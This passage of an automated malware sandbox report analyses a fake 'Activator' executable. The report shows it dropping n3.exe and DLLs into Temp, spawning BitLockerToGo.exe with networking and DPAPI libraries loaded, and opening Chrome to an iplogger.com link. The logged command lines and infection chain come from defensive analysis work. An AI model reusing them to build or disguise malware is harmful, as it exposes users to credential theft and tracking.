sync.RWMutex, or runtime-internal lock. This metric is useful for identifying global changes in lock contention. Collect a mutex or block profile using the runtime/pprof package for more detailed contention data.Estimated total available CPU time not spent executing any Go or Go runtime code. In other words, the part of /cpu/classes/total:cpu-seconds that was unused. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Memory allocated from the heap that is reserved for stack space, whether or not it is currently in-use. Currently, this represents all stack memory for goroutines. It also includes all OS thread stacks in non-cgo programs. Note that stacks may be allocated differently in the future, and this may change.^rgba\(\s*(?:(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])|(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%\s*,\s*(?:0|[1-9]\d?|1
    Source: n3.exeString found in binary or memory: Estimated total CPU time spent performing GC tasks on processors (as defined by GOMAXPROCS) dedicated to those tasks. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent running user Go code. This may also include some small amount of time spent in the Go runtime. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time goroutines spent performing GC tasks to assist the GC and prevent it from falling behind the application. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent returning unused memory to the underlying platform in response eagerly in response to memory pressure. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.^rgb\(\s*(?:(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])|(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%)\s*\)$Estimated total CPU time spent performing tasks that return unused memory to the underlying platform. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics. Sum of all metrics in /cpu/classes/scavenge.Count of small allocations that are packed together into blocks. These allocations are counted separately from other allocations because each individual allocation is not tracked by the runtime, only their block. Each block is already accounted for in allocs-by-size and frees-by-size.Approximate cumulative time goroutines have spent blocked on a sync.Mutex, sync.RWMutex, or runtime-internal lock. This metric is useful for identifying global changes in lock contention. Collect a mutex or block profile using the runtime/pprof package for more detailed contention data.Estimated total available CPU time not spent executing any Go or Go runtime code. In other words, the part of /cpu/classes/total:cpu-seconds that was unused. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Memory allocated from the heap that is reserved for stack space, whether or not it is currently in-use. Currently, this represents all stack memory for goroutines. It also includes all OS thread stacks in non-cgo programs. Note that stacks may be allocated differently in the future, and this may change.^rgba\(\s*(?:(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])\s*,\s*(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])|(?:0|[1-9]\d?|1\d\d?|2[0-4]\d|25[0-5])%\s*,\s*(?:0|[1-9]\d?|1
    Source: n3.exeString found in binary or memory: endDistribution of individual non-GC-related stop-the-world stopping latencies. This is the time it takes from deciding to stop the world until all Ps are stopped. This is a subset of the total non-GC-related stop-the-world time (/sched/pauses/total/other:seconds). During this time, some threads may be executing. Bucket counts increase monotonically.GC cycle the last time the GC CPU limiter was enabled. This metric is useful for diagnosing the root cause of an out-of-memory error, because the limiter trades memory for CPU time when the GC's CPU time gets too high. This is most likely to occur with use of SetMemoryLimit. The first GC cycle is cycle 1, so a value of 0 indicates that it was never enabled.Distribution of individual GC-related stop-the-world pause latencies. This is the time from deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (this is measured directly in /sched/pauses/stopping/gc:seconds), during which some threads may still be running. Bucket counts increase monotonically.Estimated total CPU time spent performing GC tasks on spare CPU resources that the Go scheduler could not otherwise find a use for. This should be subtracted from the total GC CPU time to obtain a measure of compulsory GC CPU time. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.<html>
    Source: n3.exeString found in binary or memory: endDistribution of individual non-GC-related stop-the-world stopping latencies. This is the time it takes from deciding to stop the world until all Ps are stopped. This is a subset of the total non-GC-related stop-the-world time (/sched/pauses/total/other:seconds). During this time, some threads may be executing. Bucket counts increase monotonically.GC cycle the last time the GC CPU limiter was enabled. This metric is useful for diagnosing the root cause of an out-of-memory error, because the limiter trades memory for CPU time when the GC's CPU time gets too high. This is most likely to occur with use of SetMemoryLimit. The first GC cycle is cycle 1, so a value of 0 indicates that it was never enabled.Distribution of individual GC-related stop-the-world pause latencies. This is the time from deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (this is measured directly in /sched/pauses/stopping/gc:seconds), during which some threads may still be running. Bucket counts increase monotonically.Estimated total CPU time spent performing GC tasks on spare CPU resources that the Go scheduler could not otherwise find a use for. This should be subtracted from the total GC CPU time to obtain a measure of compulsory GC CPU time. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.<html>
    Source: n3.exeString found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.8.2h1:bX3YxiGzFP5sOXWc3bTPEXdEaZSeVMrFgOr3T+zrFAo=
    Source: n3.exeString found in binary or memory: net/addrselect.go
    Source: n3.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile read: C:\Users\user\Desktop\Activator by URKE v2.5.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Activator by URKE v2.5.exe "C:\Users\user\Desktop\Activator by URKE v2.5.exe"
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe"
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe" Jump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: dxgidebug.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Activator by URKE v2.5.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: Activator by URKE v2.5.exeStatic file information: File size 25037648 > 1048576
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Activator by URKE v2.5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: drvstore.pdbUGP source: drvstore.dll
    Source: Binary string: DUI70.pdbUGP source: dui70.dll
    Source: Binary string: BitLockerToGo.pdb source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: main.PdBZjclTtSvJRifuFYQiitxyoCIkNHGKTcVnnvxAzYWmHRXTXqWdymDLj source: n3.exe
    Source: Binary string: dsreg.pdbGCTL source: dsreg.dll
    Source: Binary string: DWrite.pdbUGP source: DWrite.dll
    Source: Binary string: dsound.pdbUGP source: dsound.dll
    Source: Binary string: dpx.pdb source: dpx.dll
    Source: Binary string: BitLockerToGo.pdbGCTL source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dsadmin.pdbGCTL source: dsadmin.dll
    Source: Binary string: dsuiext.pdb source: dsuiext.dll
    Source: Binary string: dosvc.pdb source: dosvc.dll
    Source: Binary string: dxgi.pdbUGP source: dxgi.dll
    Source: Binary string: DUI70.pdb source: dui70.dll
    Source: Binary string: DUser.pdbUGP source: duser.dll
    Source: Binary string: dxil.pdb source: dxil.dll
    Source: Binary string: dsreg.pdb source: dsreg.dll
    Source: Binary string: dpx.pdbGCTL source: dpx.dll
    Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\dxcompiler.dll.pdb source: dxcompiler.dll
    Source: Binary string: drvstore.pdb source: drvstore.dll
    Source: Binary string: dsuiext.pdbGCTL source: dsuiext.dll
    Source: Binary string: dwmcore.pdb source: dwmcore.dll
    Source: Binary string: DWrite.pdb source: DWrite.dll
    Source: Binary string: dsadmin.pdb source: dsadmin.dll
    Source: Binary string: dxgi.pdb source: dxgi.dll
    Source: Binary string: dwmcore.pdbUGP source: dwmcore.dll
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: Activator by URKE v2.5.exe
    Source: Binary string: DUser.pdb source: duser.dll
    Source: Binary string: dsound.pdb source: dsound.dll
    Source: Binary string: dosvc.pdbUGP source: dosvc.dll
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: DWrite.dll.0.drStatic PE information: 0x9E3099E0 [Fri Feb 6 10:07:28 2054 UTC]
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5548796Jump to behavior
    Source: Activator by URKE v2.5.exeStatic PE information: section name: .didat
    Source: Activator by URKE v2.5.exeStatic PE information: section name: _RDATA
    Source: duser.dll.0.drStatic PE information: section name: .didat
    Source: dwmcore.dll.0.drStatic PE information: section name: .didat
    Source: DWrite.dll.0.drStatic PE information: section name: RT_CODE
    Source: DWrite.dll.0.drStatic PE information: section name: .didat
    Source: dxcompiler.dll.0.drStatic PE information: section name: .gxfg
    Source: dxcompiler.dll.0.drStatic PE information: section name: .retplne
    Source: dxcompiler.dll.0.drStatic PE information: section name: _RDATA
    Source: dxgi.dll.0.drStatic PE information: section name: .didat
    Source: dxil.dll.0.drStatic PE information: section name: _RDATA
    Source: n3.exe.0.drStatic PE information: section name: .symtab
    Source: dosvc.dll.0.drStatic PE information: section name: .didat
    Source: dpx.dll.0.drStatic PE information: section name: .didat
    Source: DragExt64.dll.0.drStatic PE information: section name: .rodata
    Source: DragExt64.dll.0.drStatic PE information: section name: .xdata
    Source: drvstore.dll.0.drStatic PE information: section name: .didat
    Source: dsound.dll.0.drStatic PE information: section name: RT_CODE
    Source: dsound.dll.0.drStatic PE information: section name: .didat
    Source: dsreg.dll.0.drStatic PE information: section name: .didat
    Source: dsuiext.dll.0.drStatic PE information: section name: .didat
    Source: dui70.dll.0.drStatic PE information: section name: .didat
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00452BB4 push ss; retf 0042h3_2_00452BB5
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DragExt64.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dpx.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DWrite.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dosvc.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DragExt64.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dpx.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DWrite.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dllJump to dropped file
